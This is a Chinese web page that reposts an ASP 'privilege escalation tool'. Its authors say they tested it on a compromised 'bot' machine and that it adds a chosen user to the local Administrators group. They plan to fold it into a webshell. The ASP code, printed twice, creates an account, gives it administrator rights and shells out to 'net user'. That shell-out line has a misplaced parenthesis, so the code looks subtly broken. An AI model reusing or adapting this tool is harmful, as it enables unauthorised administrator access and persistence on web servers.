添加超級(jí)用戶(hù)的.asp代碼[藍(lán)屏的原創(chuàng),凱文改進(jìn),Ms未公布的漏洞]
更新時(shí)間:2007年03月28日 00:00:00 作者:
添加超級(jí)用戶(hù)的.asp代碼[藍(lán)屏的原創(chuàng),凱文改進(jìn),Ms未公布的漏洞]
作者:藍(lán)屏,凱文 文章來(lái)源:冰點(diǎn)極限
其實(shí)上個(gè)禮拜我和凱文就在我的肉雞上測(cè)試了,還有河馬史詩(shī).結(jié)果是在user權(quán)限下成功添加Administrators組的用戶(hù)了(雖然我不敢相信我的眼睛).
上次凱文不發(fā)話,我不敢發(fā)布啊....現(xiàn)在在他的blog 上看到他發(fā)布了,就轉(zhuǎn)來(lái)了咯(比我上次測(cè)試時(shí)還改進(jìn)了一點(diǎn),加了個(gè)表單).這下大家有??ー``
反正代碼是對(duì)的,但是很少能成功,具體的看運(yùn)氣了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
<head>.network對(duì)象腳本權(quán)限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用戶(hù):<input name="username" type="text" value="kevin1986"><br>
密碼:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>
<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你還是別買(mǎi)6+1了……省下2元錢(qián)買(mǎi)瓶可樂(lè)也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登錄")>0 then
response.write "雖然沒(méi)有錯(cuò)誤,但是好象也沒(méi)建立成功.你一定很郁悶吧"
else
Response.write "OMG!"&username&"帳號(hào)居然成了!這可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "請(qǐng)輸入輸入用戶(hù)名"
end if
end if
%>
作者:藍(lán)屏,凱文 文章來(lái)源:冰點(diǎn)極限
其實(shí)上個(gè)禮拜我和凱文就在我的肉雞上測(cè)試了,還有河馬史詩(shī).結(jié)果是在user權(quán)限下成功添加Administrators組的用戶(hù)了(雖然我不敢相信我的眼睛).
上次凱文不發(fā)話,我不敢發(fā)布啊....現(xiàn)在在他的blog 上看到他發(fā)布了,就轉(zhuǎn)來(lái)了咯(比我上次測(cè)試時(shí)還改進(jìn)了一點(diǎn),加了個(gè)表單).這下大家有??ー``
反正代碼是對(duì)的,但是很少能成功,具體的看運(yùn)氣了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
復(fù)制代碼 代碼如下:
<head>.network對(duì)象腳本權(quán)限提升漏洞利用工具</head>
<form action="useradd.asp" method=post>
用戶(hù):<input name="username" type="text" value="kevin1986"><br>
密碼:<input name="passwd" type="password"><br>
<input type="submit" Value="添 加">
</form>
<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你還是別買(mǎi)6+1了……省下2元錢(qián)買(mǎi)瓶可樂(lè)也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登錄")>0 then
response.write "雖然沒(méi)有錯(cuò)誤,但是好象也沒(méi)建立成功.你一定很郁悶吧"
else
Response.write "OMG!"&username&"帳號(hào)居然成了!這可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "請(qǐng)輸入輸入用戶(hù)名"
end if
end if
%>
相關(guān)文章
asp實(shí)現(xiàn)后臺(tái)添加wma視頻文件前臺(tái)顯示
想用asp來(lái)實(shí)現(xiàn)后臺(tái)添加wma視頻文件,前臺(tái)顯示所添加的這個(gè)視頻文件,本文提供實(shí)現(xiàn)代碼2012-12-12
asp下的一個(gè)很簡(jiǎn)單的驗(yàn)證碼程序
asp下的一個(gè)很簡(jiǎn)單的驗(yàn)證碼程序...2007-11-11
asp中去除html中style,javascript,css代碼
剔除頁(yè)面中html中除文字以外的任何代碼,剛才發(fā)布了php版這個(gè)是ASP中的版本。2010-10-10
asp的SQL語(yǔ)句中and和or同時(shí)使用的注意事項(xiàng)
這篇文章主要介紹了asp的SQL語(yǔ)句中and和or同時(shí)使用的注意事項(xiàng),需要的朋友可以參考下2015-11-11
一些關(guān)于asp 購(gòu)物車(chē)的想法
剛看到吳磊同學(xué)的一些關(guān)于購(gòu)物車(chē)的想法,正巧本人丁學(xué)對(duì)電子商務(wù)這方面比較熟悉,跳出來(lái)獻(xiàn)丑了,希望對(duì)一些同行有些用處。本來(lái)想回復(fù)到下面的,結(jié)果發(fā)現(xiàn)寫(xiě)起來(lái)比較多,干脆寫(xiě)到這里好了,以后自己找起來(lái)也方便,呵呵2008-11-11

